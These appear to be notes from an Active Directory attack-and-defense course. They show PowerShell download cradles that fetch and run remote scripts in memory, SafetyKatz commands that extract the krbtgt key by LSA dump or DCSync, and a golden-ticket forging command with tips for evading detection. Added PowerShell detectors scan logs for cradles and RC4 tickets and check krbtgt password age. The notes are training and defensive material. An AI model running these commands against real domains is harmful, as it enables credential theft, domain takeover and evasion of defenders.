Advanced Active Directory Attack and Defense
The Advanced Active Directory Attack and Defense course is designed for cybersecurity professionals who want to deepen their knowledge of Active Directory (AD) security. It focuses on advanced attack techniques, organised into the following modules:
- 1-Offensive PowerShell
- 2-Offensive .NET
- 3-Tradecraft Payload Delivery
- 4-Domain Enumeration
- 5-Bypass EDRs – MDE
- 6-Privilege Escalation
- 7-Lateral Movement
- 8-Persistence
1-Offensive PowerShell
1-execute cradle
Downloading a PowerShell script and executing it immediately, in memory and without writing it to disk, is usually called a "download cradle" (this course calls it an "execute cradle"). Every variant below fetches the script text over HTTP(S) and hands it to Invoke-Expression (iex); they differ only in which component performs the download, and that choice decides how proxies are handled, which API an EDR can hook, and what the network stack logs. Whichever variant is used, the full text of the downloaded script is recorded by script block logging (Event ID 4104) as soon as it runs, so the cradle itself is rarely the stealthy part.
*** execute cradle ***
Method-1- : System.Net.WebClient, the classic cradle. It uses the system proxy but sends no proxy credentials unless they are set on the WebClient's Proxy property.
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')
Method-2- : Internet Explorer COM object. It inherits the user's browser proxy settings and cookies, so it works behind authenticated proxies, but it needs an interactive desktop session and is unavailable where Internet Explorer has been removed (Windows 11). The fixed five-second sleep is a race against page load; lengthen it on slow links.
$ie=New-Object -ComObject InternetExplorer.Application
$ie.visible=$False
$ie.navigate('http://192.x.x.x/shell.ps1')
sleep 5
$response=$ie.Document.body.innerHTML
$ie.quit()
iex $response
Method-3- : Invoke-WebRequest (alias iwr). The response object's ToString() returns its content, so iex receives the script text. On Windows PowerShell 5.1 the cmdlet parses the response with the Internet Explorer engine and can hang until IE's first-run setup has been completed; add -UseBasicParsing to avoid that.
iex (iwr 'http://192.x.x.x/shell.ps1')
Method-4- : MSXML2.XMLHTTP COM object. It goes through WinINet rather than the .NET networking stack, so it picks up the user's proxy settings and sidesteps hooks placed on System.Net. The $false in open() makes the request synchronous, so responseText is complete when send() returns.
$h=New-Object -ComObject Msxml2.XMLHTTP
$h.open('GET','http://192.x.x.x/shell.ps1',$false)
$h.send()
iex $h.responseText
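The defensive counterpart to the four cradles above, added here as an example and not part of the course material: a function that scans PowerShell script block log text (Event ID 4104) for the download primitive and the in-memory execution sink together. The pattern list, the function name and the sample script blocks are all assumptions made for this example; the samples are constructed to look like 4104 message text and are not real log data.

```powershell
# Added example (not from the course): spot download cradles in PowerShell
# script block logging (Event ID 4104, Microsoft-Windows-PowerShell/Operational).
# Pattern list covers the four methods above; the sample events are constructed.

function Test-DownloadCradle {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [string]$ScriptBlockText
    )
    process {
        # Normalise: drop backticks (in-string obfuscation), collapse whitespace, lower-case
        $text = ($ScriptBlockText -replace '`', '' -replace '\s+', ' ').ToLowerInvariant()

        # Download primitives, one per cradle method shown above
        $downloaders = @(
            @{ Name = 'WebClient.DownloadString'; Pattern = 'net\.webclient.*downloadstring' },
            @{ Name = 'InternetExplorer COM';      Pattern = 'internetexplorer\.application' },
            @{ Name = 'Invoke-WebRequest';         Pattern = '\b(iwr|invoke-webrequest|curl|wget)\b' },
            @{ Name = 'MSXML2.XMLHTTP COM';        Pattern = 'msxml2\.(server)?xmlhttp' }
        )
        # Execution sink: a download alone is not a cradle, download + iex is
        $sink = '\b(iex|invoke-expression)\b|\.invoke\(\)'

        foreach ($d in $downloaders) {
            if ($text -match $d.Pattern -and $text -match $sink) {
                [pscustomobject]@{
                    Cradle = $d.Name
                    Text   = $ScriptBlockText
                }
            }
        }
    }
}

# Constructed sample script blocks, in the shape of a 4104 ScriptBlockText field.
# Single-quoted so that $ and backticks reach the function literally.
$samples = @(
    'iex (New-Object Net.WebClient).DownloadString(''https://webserver/payload.ps1'')',
    '$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open(''GET'',''http://192.x.x.x/shell.ps1'',$false);$h.send();iex $h.responseText',
    'I`E`X (New-Object Net.WebClient).DownloadString(''http://192.x.x.x/a.ps1'')',   # backtick-obfuscated iex
    'Get-ChildItem C:\Windows\Temp | Where-Object Length -gt 1MB'                   # benign, must not match
)
$samples | Test-DownloadCradle | Format-Table -AutoSize

# On a live host, feed real events instead of the constructed samples.
# Properties[2] of a 4104 event is the ScriptBlockText field.
# Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} |
#   ForEach-Object { $_.Properties[2].Value } | Test-DownloadCradle
```

The first three samples are reported (the third despite the backtick obfuscation, because the normalisation strips backticks before matching); the benign Get-ChildItem line is not. Requiring both a downloader and a sink keeps ordinary Invoke-WebRequest usage out of the results; the price is that a cradle split across two script blocks, or one that stages through a variable executed later, is missed and needs correlation on ScriptBlockId or process.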
2-Offensive .NET
3-Tradecraft Payload Delivery
4-Domain Enumeration
5-Bypass EDRs – MDE
6-Privilege Escalation
7-Lateral Movement
8-Persistence
1-Golden Ticket
A Golden Ticket is a forged Kerberos TGT. The KDC on every domain controller encrypts and signs TGTs with the key of the krbtgt account, so an attacker who obtains that key (the NTLM hash or, better, the AES256 key) can mint a TGT for any user, with any group membership, without ever sending an AS-REQ to the KDC. The forged ticket stays valid until the krbtgt password has been changed twice, because the KDC still accepts tickets under the previous key.
1. Obtain the KRBTGT key:
A- Using SafetyKatz to dump LSA on a Domain Controller. This requires local administrator privileges on the DC itself, and /patch modifies LSASS in memory:
SafetyKatz.exe '"lsadump::lsa /patch"'
B- Using SafetyKatz to perform DCSync. This needs only the replication rights on the domain object (Replicating Directory Changes and Replicating Directory Changes All), which Domain Admins hold by default, so it runs from any domain-joined host and never touches the DC's LSASS; it does, however, generate replication traffic from a machine that is not a DC, which is the standard detection for it:
SafetyKatz.exe '"lsadump::dcsync /user:us\krbtgt"'
2. Forge and inject a Golden Ticket for the Administrator account (the domain, SID and hash below are the course lab's values; substitute the output of step 1):
SafetyKatz.exe '"kerberos::golden /User:Administrator /domain:us.techcorp.local /sid:S-1-5-21-210670787-2521448726-163245708 /krbtgt:b0975ae49f441adc6b024ad238935af5 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
/sid is the domain SID without the RID, /krbtgt is the NTLM hash of the krbtgt account, and /ptt injects the forged ticket into the current logon session instead of writing a .kirbi file. /startoffset:0 /endin:600 /renewmax:10080 give the ticket a 10-hour lifetime and a 7-day renewal window, matching the domain defaults; Mimikatz's own default of a 10-year lifetime stands out immediately in the TGS-request events (4769) the forged ticket produces. Because the ticket is built from the NTLM hash it is RC4-HMAC encrypted, which is another telltale in a domain whose real tickets use AES; supply the krbtgt AES256 key with /aes256 instead of /krbtgt to blend in.
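Two defender-side checks that follow from the golden ticket procedure above, added here as an example and not part of the course material. The first flags 4769 (service ticket request) records whose ticket encryption type is RC4-HMAC (0x17), which is what a ticket forged from the krbtgt NTLM hash looks like; the second reports the age of the krbtgt password, since a stolen hash stays usable until that password has been rotated twice. The function names and the 4769 records are assumptions made for this example; the records are constructed to mirror the fields a DC logs and are not real log data. The krbtgt check requires the ActiveDirectory module from RSAT.

```powershell
# Added example, not part of the course material. Two defender-side checks for
# forged TGTs, written as functions so they can be pointed at real data later.

# Check 1: TGS requests (Event ID 4769) whose ticket was encrypted with RC4-HMAC
# (0x17). A golden ticket built from the krbtgt NTLM hash, as in the command
# above, is RC4; once krbtgt and the clients are AES-capable, legitimate tickets
# are AES (0x11 / 0x12), so RC4 requests deserve a look. Service accounts that
# have no AES keys still produce RC4 tickets and must be baselined out.
function Find-Rc4TgsRequest {
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [hashtable]$Event   # keys as in 4769 EventData: AccountName, ServiceName, IpAddress, TicketEncryptionType
    )
    process {
        if ($Event.TicketEncryptionType -eq 0x17) {
            [pscustomobject]@{
                Account = $Event.AccountName
                Service = $Event.ServiceName
                Client  = $Event.IpAddress
                Reason  = 'RC4-HMAC service ticket (0x17)'
            }
        }
    }
}

# Check 2: krbtgt password age. The KDC accepts tickets under the current and the
# previous krbtgt key, so a forged ticket survives until two resets have happened;
# the age of the current password bounds how long a stolen hash stays useful.
function Test-KrbtgtPasswordAge {
    param([int]$MaxAgeDays = 180)   # threshold is an assumption; pick your own rotation interval
    $krbtgt = Get-ADUser -Identity krbtgt -Properties PasswordLastSet
    $age = (Get-Date) - $krbtgt.PasswordLastSet
    [pscustomobject]@{
        PasswordLastSet = $krbtgt.PasswordLastSet
        AgeDays         = [int]$age.TotalDays
        NeedsRotation   = $age.TotalDays -gt $MaxAgeDays
    }
}

# Constructed sample records in the shape of 4769 EventData (not real log data).
# ServiceName in 4769 is the service's sAMAccountName, not the SPN.
$sample4769 = @(
    @{ AccountName = 'Administrator@US.TECHCORP.LOCAL'; ServiceName = 'US-DC$';   IpAddress = '::ffff:192.168.1.50'; TicketEncryptionType = 0x17 },
    @{ AccountName = 'jdoe@US.TECHCORP.LOCAL';          ServiceName = 'US-DC$';   IpAddress = '::ffff:192.168.1.21'; TicketEncryptionType = 0x12 },
    @{ AccountName = 'svc-sql@US.TECHCORP.LOCAL';       ServiceName = 'US-SQL$';  IpAddress = '::ffff:192.168.1.30'; TicketEncryptionType = 0x17 }
)
$sample4769 | Find-Rc4TgsRequest | Format-Table -AutoSize

# Against a real DC, build the hashtables from the Security log instead:
# Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769} -MaxEvents 5000 | ForEach-Object {
#     [xml]$x = $_.ToXml(); $d = @{}
#     $x.Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
#     $d.TicketEncryptionType = [int]$d.TicketEncryptionType   # '0x17' -> 23
#     $d
# } | Find-Rc4TgsRequest
```

With the constructed records the Administrator and svc-sql requests are reported and jdoe's AES ticket is not. The svc-sql hit is the expected false positive: an account that never had AES keys generated (msDS-SupportedEncryptionTypes unset, password not changed since AES was enabled) always gets RC4 service tickets, so the useful signal is RC4 for accounts, above all privileged ones, that normally receive AES. The lifetime and renewal values in the forging command above are chosen to match domain defaults precisely so that ticket lifetime alone is not a signal; encryption type, and a TGS request for a user with no matching 4768 logon on any DC, are what remain.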